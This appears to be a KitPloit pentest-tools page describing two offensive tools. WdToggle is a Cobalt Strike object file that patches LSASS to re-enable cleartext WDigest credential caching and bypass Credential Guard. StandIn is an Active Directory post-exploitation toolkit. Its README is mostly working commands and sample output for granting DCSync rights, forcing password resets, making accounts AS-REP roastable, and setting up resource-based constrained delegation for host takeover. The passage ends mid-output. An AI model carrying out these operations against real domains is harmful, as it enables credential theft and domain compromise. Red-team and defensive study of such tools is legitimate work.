Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

WdToggle - A Beacon Object File (BOF) For Cobalt Strike Which Uses Direct System Calls To Enable WDigest Credential Caching

$
0
0


A Proof of Concept Cobalt Strike Beacon Object File which uses direct system calls to enable WDigest credential caching and circumvent Credential Guard (if enabled).

Additional guidance can be found in this blog post: https://outflank.nl/blog/?p=1592


Background

This PoC code is based on the following excellent blog posts:

Exploring Mimikatz - Part 1 - WDigest

Bypassing Credential Guard

Utilizing direct systems calls via inline assembly in BOF code provides a more opsec safe way of interacting with the LSASS process. Using direct system calls avoids AV/EDR software intercepting user-mode API calls.

Visual Studio (C++) does not support inline assembly for x64 processors. So in order to write a single Beacon Object File containing our compiled / assembled code code we must use the Mingw-w64 (GCC for Windows) compiler.


What is this repository for?
  • Demonstrate the usage of direct systems calls using inline-assembly to provide a more opsec safe way of interacting with the LSASS process.
  • Enable WDigest credential caching by toggling the g_fParameter_UseLogonCredential global parameter to 1 within the LSASS process (wdigest.dll module).
  • Circumventing Credential Guard (if enabled) by toggling the g_IsCredGuardEnabled variable to 0 within the LSASS process (wdigest.dll module).
  • Execute this code within the Beacon process using a Beacon object file.

How do I set this up?

We will not supply compiled binaries. You will have to do this yourself:

  • Clone this repository.

  • Make sure you have the Mingw-w64 compiler installed. On Mac OSX for example, we can use the ports collection to install Mingw-w64 (sudo port install mingw-w64).

  • Run the make command to compile the Beacon object file.

  • Within a Cobaltstrike beacon context run the inline-execute command and provide the path to the object WdToggle.o file.


  • Run the Cobaltstrike logonpasswords command (Mimikatz) and notice that clear text passwords are enabled again for new user logins or users who unlock their desktop session.


Limitations
  • This memory patch is not reboot persistent, so after a reboot you must rerun the code.
  • The memory offset to the wdigest!g_fParameter_UseLogonCredential and wdigest!g_IsCredGuardEnabled global variable could change between Windows versions and revisions. We provided some offsets for different builds, but these can change in future releases. You can add your own version offsets which can be found using the Windows debugger tools.
C:\Program Files (x86)\Windows Kits\10\Debuggers\x64>cdb.exe -z C:\Windows\System32\wdigest.dll

0:000>x wdigest!g_fParameter_UseLogonCredential
00000001`800361b4 wdigest!g_fParameter_UseLogonCredential = <no type information>
0:000> x wdigest!g_IsCredGuardEnabled
00000001`80035c08 wdigest!g_IsCredGuardEnabled = <no type information>
0:000>

Detection

To detect credential theft through LSASS memory access, we could use a tool like Sysmon. Sysmon can be configured to log processes opening a handle to the lsass.exe process. With this configuration applied, we can gather telemetry for suspicious processes accessing the LSASS process and help detecting possible credential dumping activity. Of course, there are more options to detect credential theft, for example using an advanced detection platform like Windows Defender ATP. But if you don’t have the budget and luxury of using these platforms, then Sysmon is that free tool that can help to fill up the gap.


Credits



StandIn - A Small .NET35/45 AD Post-Exploitation Toolkit

$
0
0


StandIn is a small AD post-compromise toolkit. StandIn came about because recently at xforcered we needed a .NET native solution to perform resource based constrained delegation. However, StandIn quickly ballooned to include a number of comfort features.

I want to continue developing StandIn to teach myself more about Directory Services programming and to hopefully expand a tool which fits in to the AD post-exploitation toolchain.



Roadmap

Contributing

Contributions are most welcome. Please ensure pull requests include the following items: description of the functionality, brief technical explanation and sample output.


ToDo's

The following items are currently on the radar for implementation in subsequent versions of StandIn.

  • Domain share enumeration. This can be split out into two parts, (1) finding and getting a unique list based on user home directories / script paths / profile paths and (2) querying fTDfs / msDFS-Linkv2 objects.
  • Finding and parsing GPO's to map users to host local groups.

Subject References

Index

Help
  __
( _/_ _// ~b33f
__)/(//)(/(/) v0.8


>--~~--> Args? <--~~--<

--help This help menu
--object LDAP filter, e.g. samaccountname=HWest
--computer Machine name, e.g. Celephais-01
--group Group name, e.g. "Necronomicon Admins"
--ntaccount User name, e.g. "REDHOOK\UPickman"
--sid String SID representing a target machine
--grant User name, e.g. "REDHOOK\KMason"
--guid Rights GUID to add to object, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
--domain Domain name, e.g. REDHOOK
--user User name
--pass Password
--newpass New password to set for object
--type Rights type: GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync
--spn Boolean, list kerberoastable accounts
--delegation Boolean, list accounts with unconstrained / constrained delegation
--asrep Boolean, list ASREP roastab le accounts
--dc Boolean, list all domain controllers
--remove Boolean, remove msDS-AllowedToActOnBehalfOfOtherIdentity property from machine object
--make Boolean, make machine; ms-DS-MachineAccountQuota applies
--disable Boolean, disable machine; should be the same user that created the machine
--access Boolean, list access permissions for object
--delete Boolean, delete machine from AD; requires elevated AD access

>--~~--> Usage? <--~~--<

# Query object properties by LDAP filter
StandIn.exe --object "(&(samAccountType=805306368)(servicePrincipalName=*vermismysteriis.redhook.local*))"
StandIn.exe --object samaccountname=Celephais-01$ --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Query object access permissions, optionally filter by NTAccount
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --access
StandIn.exe --object samaccountname=Rllyeh$ --access --ntaccount "REDHOOK\EDerby"
StandIn.exe --object samaccountname=JCurwen --access --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Grant object access permissions
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --type DCSync
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
StandIn.exe --object samaccountname=SomeTarget001$ --grant "REDHOOK\MBWillett" --type GenericWrite --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Set object password
StandIn.exe --object samaccountname=SomeTarget001$ --newpass "Arkh4mW1tch!"
StandIn.exe --object samaccountname=BJenkin --newpass "Dr34m1nTh3H#u$e" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Add ASREP to userAccountControl flags
StandIn.exe --object samaccountname=HArmitage --asrep
StandIn.exe --object samaccountname=FMorgan --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Remove ASREP from userAccountControl flags
StandIn.exe --object samaccountname=TMalone --asrep --remove
StandIn.exe --object samaccountname=RSuydam --asrep --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Get a list of all ASREP roastable accounts
StandIn.exe --asrep
StandIn.exe --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Get a list of all kerberoastable accounts
StandIn.exe --spn
StandIn.exe --spn --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# List all accounts with unconstrained & constrained delegation privileges
StandIn.exe --delegation
StandIn.exe --delegation --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Get a list of all domain controllers
StandIn.exe --dc

# List group members
StandIn.exe --group Literarum
StandIn.exe --group "Magna Ultima" --domain redhook --user R Fludd --pass Cl4vi$Alchemi4e

# Add user to group
StandIn.exe --group "Dunwich Council" --ntaccount "REDHOOK\WWhateley"
StandIn.exe --group DAgon --ntaccount "REDHOOK\RCarter" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Create machine object
StandIn.exe --computer Innsmouth --make
StandIn.exe --computer Innsmouth --make --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Disable machine object
StandIn.exe --computer Arkham --disable
StandIn.exe --computer Arkham --disable --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Delete machine object
StandIn.exe --computer Danvers --delete
StandIn.exe --computer Danvers --delete --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Add msDS-AllowedToActOnBehalfOfOtherIdentity to machine object properties
StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543
StandIn.exe --computer Providence --sid S-1-5-21-10 85031214-1563985344-725345543 --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Remove msDS-AllowedToActOnBehalfOfOtherIdentity from machine object properties
StandIn.exe --computer Miskatonic --remove
StandIn.exe --computer Miskatonic --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

LDAP Object Operations

All object operations expect that the LDAP filter returns a single object and will exit out if your query returns more. This is by design.


Get object

Use Case

Operationally, we may want to look at all of the properties of a specific object in AD. A common example would be to look at what groups a user account is member of or when a user account last authenticated to the domain.


Syntax

Get all properties of the resolved object. Queries can be simple matches for a single property or complex LDAP filters.

C:\> StandIn.exe --object samaccountname=m-10-1909-01$

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-01
Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

[?] Iterating object properties

[+] logoncount
|_ 360
[+] codepage
|_ 0
[+] objectcategory
|_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local
[+] iscriticalsystemobject
|_ False
[+] operatingsystem
|_ Windows 10 Enterprise
[+] usnchanged
|_ 195797
[+] instancetype
|_ 4
[+] name
|_ M-10-1909-01
[+] badpasswordtime
|_ 0x0
[+] pwdlastset
|_ 10/9/2020 4:42:02 PM UTC
[+] serviceprincipalname
|_ TERMSRV/M-10-1909-01
|_ TERMSRV/m-10-1909-01.main.redhook.local
|_ WSMAN/m-10-1909-01
|_ WSMAN/m-10-1909-01.main.redhook.local
|_ RestrictedKrbHost/M-10-1 909-01
|_ HOST/M-10-1909-01
|_ RestrictedKrbHost/m-10-1909-01.main.redhook.local
|_ HOST/m-10-1909-01.main.redhook.local
[+] objectclass
|_ top
|_ person
|_ organizationalPerson
|_ user
|_ computer
[+] badpwdcount
|_ 0
[+] samaccounttype
|_ SAM_MACHINE_ACCOUNT
[+] lastlogontimestamp
|_ 11/1/2020 7:40:09 PM UTC
[+] usncreated
|_ 31103
[+] objectguid
|_ 17c80232-2ee6-47e1-9ab5-22c51c268cf0
[+] localpolicyflags
|_ 0
[+] whencreated
|_ 7/9/2020 4:59:55 PM
[+] adspath
|_ LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] useraccountcontrol
|_ WORKSTATION_TRUST_ACCOUNT
[+] cn
|_ M-10-1909-01
[+] countrycode
|_ 0
[+] primarygroupid
|_ 515
[+] whenchanged
|_ 11/2/2020 7:59:32 PM
[+] operatingsystemversion
|_ 10.0 (18363)
[+] dnshostname
|_ m-10-1909-01.main.redhook.local
[+] dscorepropagationdata
|_ 10/30/2020 6:56:30 PM
|_ 10/25/2020 1:28:32 AM
|_ 7/16/2020 2:15:26 PM
|_ 7/15/2020 8:54:17 PM
|_ 1/1/1601 12:04:17 AM
[+] lastlogon
|_ 11/3/2020 10:21:11 AM UTC
[+] distinguishedname
|_ CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] msds-supportedencryptiontypes
|_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[+] samaccountname
|_ M-10-1909-01$
[+] objectsid
|_ S-1-5-21-1293271031-3053586410-2290657902-1126
[+] lastlogoff
|_ 0
[+] accountexpires
|_ 0x7FFFFFFFFFFFFFFF

Get object access permissions

Use Case

At certain stages of the engagement, the operator may want to resolve the access permissions for a specific object in AD. Many permissions can offer an operational avenue to expand access or achieve objectives. For instance, a WriteDacl permission on a group could allow the operator to grant him / her self permissions to add a new user to the group. Tools like SharpHound already, in many instances, reveal these Dacl weaknesses.


Syntax

Retrieve the active directory rules that apply to the resolved object and translate any schema / rights GUID's to their friendly name. Optionally filter the results by an NTAccount name.

C:\>StandIn.exe --object samaccountname=m-10-1909-01$ --access

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : CN=M-10-1909-01
Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\domainjoiner
|_ Group : MAIN\Domain Join

[+] Object access rules

[+] Identity --> NT AUTHORITY\SELF
|_ Type : Allow
|_ Permission : CreateChild, DeleteChild
|_ Object : ANY

[+] Identity --> NT AUTHORITY\Authenticated Users
|_ Type : Allow
|_ Permission : GenericRead
|_ Object : ANY

[... Snip ...]

C:\> StandIn.exe --object samaccountname=m-10-1909-01$ --access --ntaccount "MAIN\domainjoiner"

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : CN=M-10-1909-01
Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU =OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\domainjoiner
|_ Group : MAIN\Domain Join

[+] Object access rules

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : DeleteTree, ExtendedRight, Delete, GenericRead
|_ Object : ANY

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : User-Account-Restrictions

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : Self
|_ Object : servicePrincipalName

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : Self
|_ Object : dNSHostName

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : sAMAccountName

[+] Identity --> MAIN\do mainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : displayName

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : description

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : User-Logon

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : Self
|_ Object : DS-Validated-Write-Computer

Grant object access permission

Use Case

With the appropriate rights, the operator can grant an NTAccount special permissions over a specific object in AD. For instance, if an operator has GenericAll privileges over a user account they can grant themselves or a 3rd party NTAccount permission to change the user’s password without knowing the current password.


Syntax

Add permission to the resolved object for a specified NTAccount. StandIn supports a small set of pre-defined privileges (GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync) but it also allows operators to specify a custom rights guid using the --guid flag.

C:\> whoami
main\s4uuser

C:\> StandIn.exe --group lowPrivButMachineAccess

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Group : lowPrivButMachineAccess
GUID : 37e3d957-af52-4cc6-8808-56330f8ec882

[+] Members

[?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : s4uUser
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1197

C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\lowPrivButMachineAccess"

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : DC=main
Path : LDAP://DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators

[+] Object access rules

[+] Identity --> MAIN\lowPrivButMachineAccess
|_ Type : Allow
|_ Permission : WriteDacl
|_ Object : ANY

C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --grant "MAIN\s4uuser" --type DCSync

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : DC=main
Path : LDAP://DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators

[+] Set object access rules
|_ Success, added dcsync privileges to object for MAIN\s4uuser

C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\s4uUser"

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : DC=main
Path : LDAP://DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators

[+] Object access rules

[+] Identity --&g t; MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes-All

[+] Identity --> MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes

[+] Identity --> MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes-In-Filtered-Set

Set object password

Use Case

If the operator has User-Force-Change-Password permissions over a user object they can change the password for that user account without knowing the current password. This action is destructive as the user will no longer be able to authenticate which may raise alarm bells.


Syntax

Set the resolved object's password without knowing the current password.

C:\> whoami
main\s4uuser

C:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\lowPrivButMachineAccess"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Admins

[+] Object access rules

[+] Identity --> MAIN\lowPrivButMachineAccess
|_ Type : Allow
|_ Permission : WriteDacl
|_ Object : ANY

C:\> StandIn.exe --object "samaccountname=user005" --grant "MAIN\s4uuser" --type resetpassword

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Adm ins

[+] Set object access rules
|_ Success, added resetpassword privileges to object for MAIN\s4uuser

C:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\s4uUser"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Admins

[+] Object access rules

[+] Identity --> MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : User-Force-Change-Password

C:\> StandIn.exe --object "samaccountname=user005" --newpass "Arkh4mW1tch!"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Admins

[+] Setting account password
|_ Success, password set for object

Add/Remove ASREP from object flags

Use Case

If the operator has write access to a user account, they can modify the user’s userAccountControl flags to include DONT_REQUIRE_PREAUTH. Doing so allows the operator to request an AS-REP hash for the user which can be cracked offline. This process is very similar to kerberoasting. This action is not destructive, but it relies on the fact that the user has a password which can be cracked in a reasonable timeframe.


Syntax

Add and remove DONT_REQUIRE_PREAUTH from the resolved object's userAccountControl flags.

C:\> StandIn.exe --object "samaccountname=user005" --asrep

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD

[+] Updating userAccountControl..
|_ Success

C:\> StandIn.exe --asrep

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 1 object(s) that do not require Kerberos preauthentication..

[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

C:\> StandIn.exe --object "samaccountname=user005" --asrep --rem ove

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

[+] Updating userAccountControl..
|_ Success

C:\> StandIn.exe --asrep

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 0 object(s) that do not require Kerberos preauthentication..

ASREP

Use Case

This function enumerates all accounts in AD which are currently enabled and have DONT_REQUIRE_PREAUTH as part of their userAccountControl flags. These accounts can be AS-REP roasted, this process is very similar to kerberoasting.


Syntax

Return all accounts that are ASREP roastable.

C:\> StandIn.exe --asrep

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 1 object(s) that do not require Kerberos preauthentication..

[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

SPN

Use Case

This function enumerates all accounts in AD which are currently enabled and can be kerberoasted. Some basic account information is added for context: when was the password last set, when was the account last used and what encryption types are supported.


Syntax

Return all accounts that are kerberoastable.

C:\> StandIn.exe --spn

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Found 1 kerberostable users..

[*] SamAccountName : SimCritical
DistinguishedName : CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
ServicePrincipalName : ldap/M-2012R2-03.main.redhook.local
PwdLastSet : 11/2/2020 7:06:17 PM UTC
lastlogon : 0x0
Supported ETypes : RC4_HMAC_DEFAULT

Unconstrained / constrained / resource-based constrained delegation

Use Case

This function enumerates all accounts that are permitted to perform unconstrained, constrained, or resource-based constrained delegation. These assets can be used to expand access or achieve objectives.


Syntax

Return all accounts that have either unconstrained or constrained delegation permissions, or have inbound resource-based constrained delegation privileges.

C:\> StandIn.exe --delegation

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 3 object(s) with unconstrained delegation..

[*] SamAccountName : M-2019-03$
DistinguishedName : CN=M-2019-03,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

[*] SamAccountName : M-W16-DC01$
DistinguishedName : CN=M-W16-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local
userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

[*] SamAccountName : M-W19-DC01$
DistinguishedName : CN=M-W19-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local
userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

[?] Found 2 object(s) with constrained delegation..

[*] SamAccountName : M-2019-04$
DistinguishedName : CN=M-2019-04,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
msDS-AllowedToDelegateTo : HOST/m-w16-dc01.main.redhook.local/main.redhook.local
HOST/m-w16-dc01.main.redhook.local
HOST/M-W16-DC01
HOST/m-w16-dc01.main.redhook.local/MAIN
HOST/M-W16-DC01/MAIN
Protocol Transition : False
userAccountControl : WORKSTATION_TRUST_ACCOUNT

[*] SamAccountName : M-2019-05$
DistinguishedName : CN=M-2019-05,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
msDS-AllowedToDelegateTo : cifs/m-2012r2-03.main.redhook.local
cifs/M-2012R2-03
Protocol Transition : True
userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION

[?] Found 1 object(s) with resource-based constrained delegation..

[*] SamAccountName : M-10-1909-01$
DistinguishedName : CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
Inbound Delegation : Server Admins [GROUP]
userAccountControl : WORKSTATION_TRUST_ACCOUNT

DC's

Use Case

This function provides situational awareness by finding all domain controllers and listing some of their properties including their role assignments.


Syntax

Get all domain controllers.

C:\> StandIn.exe --dc

[?] Using DC : m-w16-dc01.main.redhook.local
|_ Domain : main.redhook.local

[*] Host : m-w16-dc01.main.redhook.local
Domain : main.redhook.local
Forest : main.redhook.local
SiteName : Default-First-Site-Name
IP : 10.42.54.5
OSVersion : Windows Server 2016 Datacenter
Local System Time UTC : Tuesday, 03 November 2020 03:29:17
Role : SchemaRole
NamingRole
PdcRole
RidRole
InfrastructureRole

[*] Host : m-w19-dc01.main.redhook.local
Domain : main.redhook.local
Forest : main.redhook.local
SiteName : Default-First-Site-Name
IP : 10.42.54.13
OSVersion : Windows Server 2019 Datacenter
Local System Time UTC : Tuesday, 03 November 2020 03:29:17

Groups Operations

These functions deal specificaly with domain groups.


List group membership

Use Case

This function provides situational awareness, listing all members of a domain group including their type (user or nested group).


Syntax

Enumerate group membership and provide rudementary details for the member objects.

C:\> StandIn.exe --group "Server Admins"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group : Server Admins
GUID : 92af8954-58cc-4fa4-a9ba-69bfa5524b5c

[+] Members

[?] Path : LDAP://CN=Workstation Admins,OU=Groups,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : Workstation Admins
Type : Group
SID : S-1-5-21-1293271031-3053586410-2290657902-1108

[?] Path : LDAP://CN=Server Admin 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin001
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1111

[?] Path : LDAP://CN=Server Admin 002,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin002
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1184

[?] Path : LDAP://CN =Server Admin 003,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin003
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1185

[?] Path : LDAP://CN=Server Admin 004,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin004
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1186

[?] Path : LDAP://CN=Server Admin 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin005
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1187

[?] Path : LDAP://CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : SimCritical
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1204

Add user to group

Use Case

With appropriate access the operator can add an NTAccount to a domain group.


Syntax

Add an NTAccount identifier to a domain group. Normally this would be a user but it could also be a group.

C:\> StandIn.exe --group lowprivbutmachineaccess

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group : lowPrivButMachineAccess
GUID : 37e3d957-af52-4cc6-8808-56330f8ec882

[+] Members

[?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : s4uUser
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1197

C:\> StandIn.exe --group lowprivbutmachineaccess --ntaccount "MAIN\user001"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group : lowPrivButMachineAccess
GUID : 37e3d957-af52-4cc6-8808-56330f8ec882

[+] Adding user to group
|_ Success

C:\> StandIn.exe --group lowprivbutmachineaccess

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group : lowPrivButMachineAccess
GUID : 37e3d957-af52-4cc6-8808-56330f8ec882

[+] Members

[?] Path : LDAP://CN=User 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : user001
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1106

[?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : s4uUser
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1197

Machine Object Operations

These functions specifically are for machine operations and expect the machine name as an input.


Create machine object

Use Case

The operator may wish to create a machine object in order to perform a resource based constrained delegation attack. By default any domain user has the ability to create up to 10 machines on the local domain.


Syntax

Create a new machine object with a random password, user ms-DS-MachineAccountQuota applies to this operation.

C:\> StandIn.exe --computer M-1337-b33f --make

[?] Using DC : m-w16-dc01.main.redhook.local
|_ Domain : main.redhook.local
|_ DN : CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local
|_ Password : MlCGkaacS5SRUOt

[+] Machine account added to AD..

The ms-DS-MachineAccountQuota property exists in the domain root object. If you need to verify the quota you can perform an object search as shown below.

C:\> StandIn.exe --object ms-DS-MachineAccountQuota=*

Disable machine object

Use Case

Standard users do not have the ability to delete a machine object, however a user that create a machine can thereafter disable the machine object.


Syntax

Disable a machine that was previously created. This action should be performed in the context of the same user that created the machine. Note that non-elevated users can't delete machine objects only disable them.

C:\> StandIn.exe --computer M-1337-b33f --disable

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-1337-b33f
Path : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local

[+] Machine account currently enabled
|_ Account disabled..

Delete machine object

Use Case

With elevated AD privileges the operator can delete a machine object, such as once create earlier in the attack chain.


Syntax

Use an elevated context to delete a machine object.

C:\> StandIn.exe --computer M-1337-b33f --delete

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-1337-b33f
Path : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local

[+] Machine account deleted from AD

Add msDS-AllowedToActOnBehalfOfOtherIdentity

Use Case

With write access to a machine object this function allows the operator to add an msDS-AllowedToActOnBehalfOfOtherIdentity property to the machine which is required to perform a resource based constrained delegation attack.


Syntax

Add an msDS-AllowedToActOnBehalfOfOtherIdentity propert to the machine along with a SID to facilitate host takeover using resource based constrained delegation.

C:\> StandIn.exe --computer m-10-1909-03 --sid S-1-5-21-1293271031-3053586410-2290657902-1205

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-03
Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity

C:\> StandIn.exe --object samaccountname=m-10-1909-03$

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-03
Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

[?] Iterating object properties

[+] logoncount
|_ 107
[+] codepage
